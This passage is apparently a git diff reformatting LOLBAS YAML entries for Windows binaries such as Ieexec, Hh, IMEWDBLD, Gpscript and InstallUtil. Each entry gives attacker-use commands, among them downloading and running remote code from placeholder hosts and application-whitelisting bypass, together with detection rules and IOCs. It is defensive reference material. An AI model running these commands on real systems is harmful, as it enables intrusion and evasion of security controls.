c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ +- Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ +- Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ +- Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ +- Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ +- Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ +- Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ +- Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ +- Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ +- Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ +- Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ +- Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ +- Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ +- Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ +- Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ +- Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ +- Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ +- Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ +- Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ +- Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ +- Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ +- Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ +- Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ +- Path: c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ +- Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ +- Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ +- Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ +- Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ +- Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ +- Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ +- Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ +- Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ +- Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ +- Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ +- Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ +- Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ +- Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ +- Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ +- Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ +- Path: c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ +- Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ +- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ +- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\ Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_file_download_via_gfxdownloadwrapper.yml - - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com. +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_file_download_via_gfxdownloadwrapper.yml +- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com. Resources: - - Link: https://www.sothis.tech/author/jgalvez/ +- Link: https://www.sothis.tech/author/jgalvez/ Acknowledgement: - - Person: Jesus Galvez - Handle: ---- +- Person: Jesus Galvez + Handle: null diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 22ecd6a0d..0839a07e6 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml @@ -1,35 +1,35 @@ ---- Name: Gpscript.exe Description: Used by group policy to process scripts -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Gpscript /logon - Description: Executes logon scripts configured in Group Policy. - Usecase: Add local group policy logon script to execute file and hide from defensive counter measures - Category: Execute - Privileges: Administrator - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: Gpscript /startup - Description: Executes startup scripts configured in Group Policy - Usecase: Add local group policy logon script to execute file and hide from defensive counter measures - Category: Execute - Privileges: Administrator - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: Gpscript /logon + Description: Executes logon scripts configured in Group Policy. + Usecase: Add local group policy logon script to execute file and hide from defensive + counter measures + Category: Execute + Privileges: Administrator + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: Gpscript /startup + Description: Executes startup scripts configured in Group Policy + Usecase: Add local group policy logon script to execute file and hide from defensive + counter measures + Category: Execute + Privileges: Administrator + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\gpscript.exe - - Path: C:\Windows\SysWOW64\gpscript.exe +- Path: C:\Windows\System32\gpscript.exe +- Path: C:\Windows\SysWOW64\gpscript.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml - - IOC: Scripts added in local group policy - - IOC: Execution of Gpscript.exe after logon +- Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml +- IOC: Scripts added in local group policy +- IOC: Execution of Gpscript.exe after logon Resources: - - Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ +- Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' ---- +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index ad15db63a..29201c6d2 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -1,38 +1,36 @@ ---- Name: Hh.exe Description: Binary used for processing chm files in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: HH.exe http://some.url/script.ps1 - Description: Open the target PowerShell script with HTML Help. - Usecase: Download files from url - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: HH.exe c:\windows\system32\calc.exe - Description: Executes calc.exe with HTML Help. - Usecase: Execute process with HH.exe - Category: Execute - Privileges: User - MitreID: T1218.001 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: HH.exe http://some.url/script.ps1 + Description: Open the target PowerShell script with HTML Help. + Usecase: Download files from url + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: HH.exe c:\windows\system32\calc.exe + Description: Executes calc.exe with HTML Help. + Usecase: Execute process with HH.exe + Category: Execute + Privileges: User + MitreID: T1218.001 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\hh.exe - - Path: C:\Windows\SysWOW64\hh.exe +- Path: C:\Windows\hh.exe +- Path: C:\Windows\SysWOW64\hh.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_hh_chm.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_html_help_spawn.yml - - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml - - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml - - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_hh_chm.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_html_help_spawn.yml +- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml +- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml +- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml +- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml Resources: - - Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ +- Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' ---- +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml index 2199ed52a..e2740e4fb 100644 --- a/yml/OSBinaries/IMEWDBLD.yml +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -1,23 +1,24 @@ ---- Name: IMEWDBLD.exe Description: Microsoft IME Open Extended Dictionary Module -Author: 'Wade Hickey' +Author: Wade Hickey Created: '2020-03-05' Commands: - - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw - Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 10 +- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL + as an argument, it will download the file served at by that URL and save it to + %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. + or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10 Full_Path: - - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe +- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml Resources: - - Link: https://twitter.com/notwhickey/status/1367493406835040265 +- Link: https://twitter.com/notwhickey/status/1367493406835040265 Acknowledgement: - - Person: Wade Hickey - Handle: '@notwhickey' ---- +- Person: Wade Hickey + Handle: '@notwhickey' diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index f5a9e3dcd..db34a8975 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -1,30 +1,28 @@ ---- Name: Ie4uinit.exe -Description: -Author: 'Oddvar Moe' +Description: null +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: ie4uinit.exe -BaseSettings - Description: Executes commands from a specially prepared ie4uinit.inf file. - Usecase: Get code execution by copy files to another location - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: ie4uinit.exe -BaseSettings + Description: Executes commands from a specially prepared ie4uinit.inf file. + Usecase: Get code execution by copy files to another location + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: c:\windows\system32\ie4uinit.exe - - Path: c:\windows\sysWOW64\ie4uinit.exe - - Path: c:\windows\system32\ieuinit.inf - - Path: c:\windows\sysWOW64\ieuinit.inf +- Path: c:\windows\system32\ie4uinit.exe +- Path: c:\windows\sysWOW64\ie4uinit.exe +- Path: c:\windows\system32\ieuinit.inf +- Path: c:\windows\sysWOW64\ieuinit.inf Code_Sample: - - Code: +- Code: null Detection: - - IOC: ie4uinit.exe copied outside of %windir% - - IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir% - - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml +- IOC: ie4uinit.exe copied outside of %windir% +- IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir% +- Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml Resources: - - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ +- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Acknowledgement: - - Person: Jimmy - Handle: '@bohops' ---- +- Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index aa591b15c..ab7c33c18 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -1,37 +1,38 @@ ---- Name: Ieexec.exe -Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. -Author: 'Oddvar Moe' +Description: The IEExec.exe application is an undocumented Microsoft .NET Framework + application that is included with the .NET Framework. You can use the IEExec.exe + application as a host to run other managed applications that you start by using + a URL. +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Description: Downloads and executes bypass.exe from the remote server. - Usecase: Download and run attacker code from remote location - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe - Description: Downloads and executes bypass.exe from the remote server. - Usecase: Download and run attacker code from remote location - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe + Description: Downloads and executes bypass.exe from the remote server. + Usecase: Download and run attacker code from remote location + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe + Description: Downloads and executes bypass.exe from the remote server. + Usecase: Download and run attacker code from remote location + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe +- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - IOC: Network connections originating from ieexec.exe may be suspicious +- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml +- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +- IOC: Network connections originating from ieexec.exe may be suspicious Resources: - - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ +- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' ---- +- Person: Casey Smith + Handle: '@subtee' diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index 98bf87ca0..f49130905 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml @@ -1,35 +1,33 @@ ---- Name: Ilasm.exe Description: used for compile c# code into dll or exe. Author: Hai vaknin (lux) Created: 2020-03-17 Commands: - - Command: ilasm.exe C:\public\test.txt /exe - Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Compile - Privileges: User - MitreID: T1127 - OperatingSystem: Windows 10,7 - - Command: ilasm.exe C:\public\test.txt /dll - Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll - Usecase: A description of the usecase - Category: Compile - Privileges: User - MitreID: T1127 +- Command: ilasm.exe C:\public\test.txt /exe + Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + OperatingSystem: Windows 10,7 +- Command: ilasm.exe C:\public\test.txt /dll + Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll + Usecase: A description of the usecase + Category: Compile + Privileges: User + MitreID: T1127 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe +- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code_Sample: - - Code: +- Code: null Detection: - - IOC: Ilasm may not be used often in production environments (such as on endpoints) - - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml +- IOC: Ilasm may not be used often in production environments (such as on endpoints) +- Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml Resources: - - Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt +- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt Acknowledgement: - - Person: Hai Vaknin(Lux) - Handle: '@VakninHai' - - Person: Lior Adar - Handle: ---- +- Person: Hai Vaknin(Lux) + Handle: '@VakninHai' +- Person: Lior Adar + Handle: null diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 894317c2a..f91d57e16 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -1,29 +1,28 @@ ---- Name: Infdefaultinstall.exe Description: Binary used to perform installation based on content inside inf files -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: InfDefaultInstall.exe Infdefaultinstall.inf - Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. - Usecase: Code execution - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: InfDefaultInstall.exe Infdefaultinstall.inf + Description: Executes SCT script using scrobj.dll from a command in entered into + a specially prepared INF file. + Usecase: Code execution + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\Infdefaultinstall.exe - - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe +- Path: C:\Windows\System32\Infdefaultinstall.exe +- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe Code_Sample: - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +- Sigma: https://github.com/SigmaHQ/sigma/blob/85d47aeabc25bbd023284849f4466c1e00b855ce/rules/windows/process_creation/process_creation_infdefaultinstall.yml +- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 - - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ - - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ +- Link: https://twitter.com/KyleHanslovan/status/911997635455852544 +- Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ +- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Acknowledgement: - - Person: Kyle Hanslovan - Handle: '@kylehanslovan' ---- +- Person: Kyle Hanslovan + Handle: '@kylehanslovan' diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 4314b56cb..8694e31be 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -1,42 +1,48 @@ ---- Name: Installutil.exe -Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies -Author: 'Oddvar Moe' +Description: The Installer tool is a command-line utility that allows you to install + and uninstall server resources by executing the installer components in specified + assemblies +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Description: Execute the target .NET DLL or EXE. - Usecase: Use to execute code and bypass application whitelisting - Category: AWL bypass - Privileges: User - MitreID: T1218.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll - Description: Execute the target .NET DLL or EXE. - Usecase: Use to execute code and bypass application whitelisting - Category: Execute - Privileges: User - MitreID: T1218.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + Description: Execute the target .NET DLL or EXE. + Usecase: Use to execute code and bypass application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1218.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + Description: Execute the target .NET DLL or EXE. + Usecase: Use to execute code and bypass application whitelisting + Category: Execute + Privileges: User + MitreID: T1218.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - - Path: 